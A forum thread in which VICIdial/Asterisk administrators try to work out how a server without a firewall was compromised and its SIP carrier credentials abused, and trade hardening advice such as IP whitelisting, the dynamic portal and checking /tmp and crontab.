Page 1 of 1

Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:09 pm
by dspaan
Today i made the stupid mistake of forgetting to start the firewall on a development server and it was hacked within two hours. They managed to get the registration info from the carrier and start dialing with it. Can anyone point out how they might have done this without SSH access?

The only way i can think of is by direct database access.

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:14 pm
by carpenox
that doesnt make sense tho because mysql should be 127.0.0.1 only right? check the directory /t,p and tell me what hidden directories you see there

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:24 pm
by dspaan
You're right, i'm confused with another way to access that database but that still requires SSH.

In /srv/www/htdocs i don't see any new directories and neither in the root directory. I checked the asterisk messages log and the calls were made directly via the trunk and not through vicidial.

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:36 pm
by carpenox
check in /tmp - "cd /tmp"

there is a new exploit that loads a small payload file in that directory and runs a bitcoin mining program and backdoor

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:57 pm
by dspaan
This is what i see:
Image

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 8:36 pm
by carpenox
Looks good. You didn't have anything in the access log?

Re: Asterisk hacked

PostPosted: Tue Sep 01, 2020 1:50 am
by dspaan
No, i checked access log. So still wondering how they acquired those credentials.

Re: Asterisk hacked

PostPosted: Wed Sep 02, 2020 5:27 pm
by mubeen
Check crontab, the exploit carpenox is talking about usually removes entries from crontab and add its own cron job, not only by name of div, div1 etc but .ICE-unix as well

Re: Asterisk hacked

PostPosted: Fri Sep 11, 2020 3:00 pm
by dspaan
I restored a snapshot of the hacked server and checked crontab but nothing unusual in there. During the exposure we also got this notifications from our datacenter but i assume that's just a standard warning because the firewall was open. Still no idea how they got in and found carrier credentials.

What is an 'Open Portmapper Server'?
The port mapper (rpc.portmap or rpcbind) is a remote procedure call (RPC) service running on TCP or UDP port 111 that runs on servers to provide information about running services and their corresponding port numbers, such as NFS.

Why would this be bad?
Once an attacker discovers an active port 111 on a device, he can use this information to learn about running services, which is a very important first step for a hacking attack.

Additionally, hackers have also found this feature useful in performing a special type of DDoS attack called an 'Amplification Attack'.

The attacker sends a packet apparently from the intended victim to some server on the Internet that will reply immediately. Because the source IP address is forged, the remote Internet server replies and sends data to the victim.

That has two effects: the actual source of the attack is hidden and is very hard to trace, and, if many Internet servers are used, an attack can consist of an overwhelming number of packets hitting a victim from all over the world.

But what makes reflection attacks really powerful is when they are also amplified: when a small forged packet elicits a large reply from the server (or servers). In that case, an attacker can send a small packet 'from' a forged source IP address and have the server (or servers) send large replies to the victim.

Amplification attacks like that result in an attacker turning a small amount of bandwidth coming from a small number of machines into a massive traffic load hitting a victim from around the Internet.

Recommended action
We recommend you to only allow RPC calls from trusted sources. This can be achieved by dropping all traffic for RPC services on your local firewall and only allowing connections from trusted IP addresses.

Re: Asterisk hacked

PostPosted: Fri Sep 11, 2020 5:33 pm
by carpenox
so one of your services was probably exploited with an 0day. No way to really tell without the logs

Re: Asterisk hacked

PostPosted: Fri Sep 11, 2020 5:48 pm
by qeshmja
I used to work with remote administration tools in cybersecurity.
check if you got infected with a malware or a RAT, someone using your carrier dsnt mean they got access to it via vicidial or asterisk.
Maybe they got all your SIP info from your e-mail, or you stored your user/passwords ..etc in some .txt files just like every human on this planet.
or someone got your vicidial user/password.

exploiting asterisk to gain access and use your voip provider.. nah!
to much work when they are 100 easier ways.

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 8:55 am
by muratyilmaz.dev
@dspaan I faced a similar situation. Were you able to reach a conclusion?

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 9:53 am
by dspaan
No i didn't have time to investigate further. All i can say is change your SSH port to something else and better yet, use whitelisting.

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 11:50 am
by carpenox
Yes, please secure your servers: I wrote this article a couple months ago and I can not stress enough, please use it @all


https://cyburityllc.com/?p=1977

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 12:09 pm
by dspaan
Another thing that should be a default step to secure vicidial is change the cron password but i haven't delved deep enough to analyze what the correct procedure is (and impact of incorrectly changing it). I did find this but i don't know if this Poundteam script is still up-to-date for the latest vicidial SVN: http://cc24x7.blogspot.com/2016/04/how- ... e-and.html

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 2:18 pm
by carpenox
you can just change it during the install.pl script and mirror it in admin > servers

but either way it wont matter with IP whitelist

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 3:10 pm
by muratyilmaz.dev
Thanks a lot for the information. I skimmed the article. But I don't use whitelist. My agents and their locations are too many, so customers do not prefer it. I want to use Blacklist and Geoblock.

My problem is:
There is a physical firewall on the datacenter. Here, 21,22,23,3306,5432 ports are defined only to my ip address.

They take my sip information from Vicidial and make a direct call. So it doesn't exit through my Asterisk. With a softphone, they make calls directly using the voip account. I am changing the password of my voip account. I'm also updating the vicidial.
They're hacking again.

I found resources with an attack on agc/manager_send.php

I don't know if the internal firewall blocks this.

I will get support from an expert tomorrow. I'll let you know the results.

http://support.vicidial.de/mobile.php?p ... w=&lang=en

https://www.youtube.com/watch?v=MWUugOb9z4c&t=43s

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 3:27 pm
by dspaan
You should use dynamic portal, that way everyone can login through a special URL and they whitelist themselves by logging in and when they are inactive or the IP changes it gets automatically removed from the firewall.

Re: Asterisk hacked

PostPosted: Thu Jun 24, 2021 6:52 am
by muratyilmaz.dev
Hi,
Yes. I reviewed Dynamic Portal. I used the links below. Thank you so much.

https://www.youtube.com/watch?v=3ID7IRT3zUE

https://cyburityllc.com/?p=1765

I activated it. Everything is very beautiful. But there is one problem. Most of the agents are old :)

Therefore to them

https://site.com:446/valid8_or_custom_url.php

It is very difficult for me to tell them to use a url like. Wouldn't it be more perfect if there was only one validation.php file that would be allowed to run under 80 or 443 vhosts.

for example,
https://site.com/valid8_or_custom_url.php

I think it's a request against firewall - vhost logic. I do not know. Maybe something like this in Apache rules.

Listen to port 80...
Listen to port 443...

If no response, go to port 446.

https://site.com:446/index.php

I think this will go against method validation logic. I'm curious about your opinions.
Note: You can reply so that agents can bookmark the validation url :)

Re: Asterisk hacked

PostPosted: Thu Jun 24, 2021 7:03 am
by dspaan
The URL for dynamic portal is a custom port and difficult URL deliberatly so it's not obvious for hackers to guess or scan. Otherwise it would defy the purpose, you could just open up port 80 on your main URL.

Re: Asterisk hacked

PostPosted: Thu Jun 24, 2021 7:20 am
by muratyilmaz.dev
You said "you could just open up port 80 on your main URL".

Can I activate only 1 page while white or dynamic method is active?

https://site.com/index.php

firewall-cmd --zone=public .... do I need to write such a rule?